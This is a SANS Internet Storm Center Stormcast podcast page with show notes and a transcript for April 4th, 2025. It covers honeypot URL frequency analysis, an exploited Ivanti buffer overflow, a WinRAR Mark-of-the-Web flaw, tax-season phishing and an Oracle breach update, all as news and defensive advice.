Handler on Duty: Guy Bruneau
Threat Level: green
Podcast Detail
SANS Stormcast Friday, Apr 4th: URL Frequency Analysis; Ivanti Flaw Exploited; WinRAR MotW Vuln; Tax filing scams; Oracle Breach Update
If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9394.mp3
URL Frequency Analysis; Ivanti Flaw Exploited; WinRAR MotW Vuln; Tax filing scams; Oracle Breach Update
00:00
My Next Class
| Application Security: Securing Web Apps, APIs, and Microservices | Orlando | Apr 13th - Apr 18th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | San Diego | May 5th - May 10th 2025 |
Exploring Statistical Measures to Predict URLs as Legitimate or Intrusive
Using frequency analysis, and training the model with honeypot data as well as log data from legitimate websites allows for a fairly simple and reliable triage of web server logs to identify possible malicious activity.
https://isc.sans.edu/diary/Exploring%20Statistical%20Measures%20to%20Predict%20URLs%20as%20Legitimate%20or%20Intrusive%20%5BGuest%20Diary%5D/31822
Critical Unexploitable Ivanti Vulnerability Exploited CVE-2025-22457
In February, Ivanti patched CVE-2025-22457. At the time, the vulnerability was not considered to be exploitable. Mandiant now published a blog disclosing that the vulnerability was exploited as soon as mid-march
https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability/
WinRAR MotW Vulnerability CVE-2025-31334
WinRAR patched a vulnerability that would not apply the “Mark of the Web” correctly if a compressed file included symlinks. This may make it easier to trick a victim into executing code downloaded from a website.
https://nvd.nist.gov/vuln/detail/CVE-2025-31334
Microsoft Warns of Tax-Related Scam
With the US personal income tax filing deadline only about a week out, Microsoft warns of commonly deployed scams that they are observing related to income tax filings
https://www.microsoft.com/en-us/security/blog/2025/04/03/threat-actors-leverage-tax-season-to-deploy-tax-themed-phishing-campaigns/
Oracle Breach Update
https://www.bloomberg.com/news/articles/2025-04-02/oracle-tells-clients-of-second-recent-hack-log-in-data-stolen
iTunes
MP3 Download
RSS Feed
Google
Podbean
Amazon Echo
YouTube
Spreaker
Spotify
Discussion
Login here to join the discussion.
| Application Security: Securing Web Apps, APIs, and Microservices | Orlando | Apr 13th - Apr 18th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | San Diego | May 5th - May 10th 2025 |
| Network Monitoring and Threat Detection In-Depth | Baltimore | Jun 2nd - Jun 7th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | Washington | Jul 14th - Jul 19th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | Las Vegas | Sep 22nd - Sep 27th 2025 |
Podcast Transcript
Hello and welcome to the Friday, April 4th, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich and today I'm recording from Jacksonville, Florida. Today we got another diary from one of our undergraduate interns, Gregory Weber, did talk about while analyzing URLs collected by honeypots and how to identify malicious traffic and distinguish it from normal traffic to a web application. Of course, honeypots, by definition, really only get malicious requests. So Gregory did compare it to data from a normal website, did some frequency analysis on it, and actually came up with a model that looks reasonably good in distinguishing attacks from non-attacks. I think it still needs a little bit of refinement and maybe more data really to validate it well, but it's an interesting approach and there, of course, is a lot of work happening currently doing sort of some more automated log analysis, automated intrusion detection, using some of these machine learning techniques. And the next story falls in the category, never underestimate the creativity of a sophisticated attacker. In this example, it's a critical vulnerability in Ivanti Connect Secure. It was patched in February. It's a buffer overflow, but exploitation is quite constrained for that buffer overflow. So Ivanti initially assessed that this particular vulnerability is not exploitable. Well, they were proven wrong now, apparently, by some actor that may be associated with some Chinese state actors. According to Mandiant, who wrote about it, it looks like they reversed the patch, a very common technique, of course, to figure out what the exact vulnerability was. And yes, then came up with an exploit that was applicable, even though these constraints, of course, still applied. Interesting blog post. Apparently, these attacks started in mid-March. And as of today, Ivanti also disclosed that this vulnerability has actually been exploited. And yet another mark of the web vulnerability, this time in WinRAR. So like all of these decompression unpacking style programs, well, if the original file was downloaded from the web, they have to apply this mark of the web to all the files that they're expanding. WinRAR usually does that, but apparently doesn't do it correctly if there are sim links involved. And that's the vulnerability was addressed here. Not a huge deal, I think, but certainly something that you do want to update, given that this is a relatively popular software. And well, it's already sort of a week into April almost. With that, we are getting close to the tax filing deadline in the U.S., April 15th. Microsoft released a timely warning here that, well, they're seeing, of course, the usual number of tax-related scams. And definitely something that you do want to share with colleagues, particular less technical colleagues, what is being done here right now. Personally, I've actually not seen a lot. I don't think any really so far this year. But the typical things are fake tax form, download sites, QR codes being used to trick users into going to malicious sites. Also, be a little bit careful as to what websites you're using for tax filing services. Remember, I think it was two years ago, we found like e-file.com, for example, being compromised around tax filing season. So definitely go with name brand websites that you have used in the past that already have your data. And so far, if they're compromised, well, your data is lost anyway. But definitely be a little bit careful here who you are using in order to file your tax. And with that, giving them a lot of your personal information. And talking about trust and breaches, Oracle now apparently has notified some of its customers that their login credentials may have been leaked. They say this is associated with an older system. And the data that was actually being leaked here was not current data. Now, the group that actually leaked the data has disputed that. Again, this comes back down to how much do you trust your cloud providers? Because in the end, that's what cloud is all about. You can't really verify their information that they're giving you. So you're trusting that they're giving you the right, correct information to make sound decisions with. Assume something happened here. But of course, we still don't exactly know what and what the extent is. And yes, be ready that Oracle may notify you in private, even though their public statements at this point don't really say much about this particular breach. Well, that's it for today. If you've got a minute, please leave a good review on any of the podcast sites where you're downloading this particular podcast. From subscribe, of course, to automatically be offered any new episodes being released. Remember, we also have like Alexa, for example. You can get the podcast via that. We have YouTube and a bunch of other channels where we do offer this podcast. Thanks and talk to you again on Monday. Bye.
Keep yourself informed with our aggregate InfoSec news
© 2025 SANS™ Internet Storm Center
Developers: We have an API for you! 